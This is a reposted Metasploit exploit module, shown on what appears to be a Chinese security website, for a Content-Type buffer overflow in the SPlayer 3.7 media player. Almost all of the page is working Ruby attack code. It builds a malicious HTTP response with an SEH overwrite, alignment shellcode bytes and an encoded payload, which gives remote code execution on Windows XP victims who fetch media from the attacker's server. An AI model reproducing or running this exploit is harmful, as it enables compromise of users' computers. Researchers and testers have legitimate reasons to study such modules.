首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SPlayer 3.7 Content-Type Buffer Overflow
来源:http://www.metasploit.com 作者:sinn3r 发布时间:2011-05-12  

##
# $Id: splayer_content_type.rb 12581 2011-05-11 00:18:11Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::Remote::HttpServer::HTML

 def initialize(info={})
  super(update_info(info,
   'Name'           => "SPlayer 3.7 Content-Type Buffer Overflow",
   'Description'    => %q{
     This module exploits a vulnerability in SPlayer v3.7 or piror.  When SPlayer
    requests the URL of a media file (video or audio), it is possible to gain arbitrary
    remote code execution due to a buffer overflow caused by an exceeding length of data
    as the 'Content-Type' parameter.
   },
   'License'        => MSF_LICENSE,
   'Version'        => "$Revision: 12581 $",
   'Author'         =>
    [
     'xsploitedsec <xsploitedsecurity[at]gmail.com>',  #Initial discovery, PoC
     'sinn3r', #Metasploit
    ],
   'References'     =>
    [
     ['URL', 'http://www.exploit-db.com/exploits/17243/'],
    ],
   'Payload'        =>
    {
     'BadChars'        => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f",
     'StackAdjustment' => -3500,
     'EncoderType'     => Msf::Encoder::Type::AlphanumMixed,
     'BufferRegister'  => 'ECX',
    },
   'DefaultOptions'  =>
    {
     'ExitFunction'         => "seh",
     'InitialAutoRunScript' => 'migrate -f',
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [
      'Windows XP SP2/XP3',
      {
       'Offset' => 2073,    #Offset to SEH
       'Ret'    => 0x7325,  #Unicode P/P/R (splayer.exe)
       'Max'    => 30000,   #Max buffer size
      }
     ],
    ],
   'Privileged'     => false,
   'DisclosureDate' => "May 4 2011",
   'DefaultTarget'  => 0))
 end

 def get_unicode_payload(p)
  encoder = framework.encoders.create("x86/unicode_mixed")
  encoder.datastore.import_options_from_hash( {'BufferRegister'=>'EAX'} )
  unicode_payload = encoder.encode(p, nil, nil, platform)
  return unicode_payload
 end

 def on_request_uri(cli, request)

  agent = request.headers['User-Agent']
  if agent !~ /Media Player Classic/
   send_not_found(cli)
   print_error("#{cli.peerhost}:#{cli.peerport} Unknown user-agent")
   return
  end

  nop = "\x73"

  #MOV EAX,EDI; XOR AL,C3; INC EAX; XOR AL,79; PUSH EAX; POP ECX; JMP SHORT 0x40
  alignment = "\x8b\xc7\x34\xc3\x40\x34\x79\x50\x59\xeb\x40"
  padding = nop*6
  p = get_unicode_payload(alignment + padding + payload.encoded)

  sploit = rand_text_alpha(2073)
  sploit << "\x61\x73"
  sploit << "\x25\x73"
  sploit << nop
  sploit << "\x55"
  sploit << nop
  sploit << "\x58"
  sploit << nop
  sploit << "\x05\x19\x11"
  sploit << nop
  sploit << "\x2d\x11\x11"
  sploit << nop
  sploit << "\x50"
  sploit << nop
  sploit << "\x50"
  sploit << nop
  sploit << "\x5f"
  sploit << nop
  sploit << "\xc3"
  sploit << rand_text_alpha(1000)
  sploit << p
  sploit << rand_text_alpha(target['Max']-sploit.length)

  print_status("Sending malicious content-type to #{cli.peerhost}:#{cli.peerport}...")
  send_response(cli, '', {'Content-Type'=>sploit})

 end

end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ICONICS WebHMI ActiveX Buffer
·Chasys Media Player 2.0 Buffer
·onArcade v1.1.1 Game CSRF (Cro
·(Firefox & Safari & IE) + Quic
·Symantec Backup Exec System Re
·SlimPDF Reader PoC
·A-PDF All to MP3 Converter v.2
·A-PDF Wav to MP3 Converter v 1
·Serva32 1.2.00 RC1 Denial Of S
·Adobe Audition 3.0 (build 7283
·VideoLAN VLC ModPlug ReadS3M S
·Win32 VB6_vbaExceptHandler - S
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved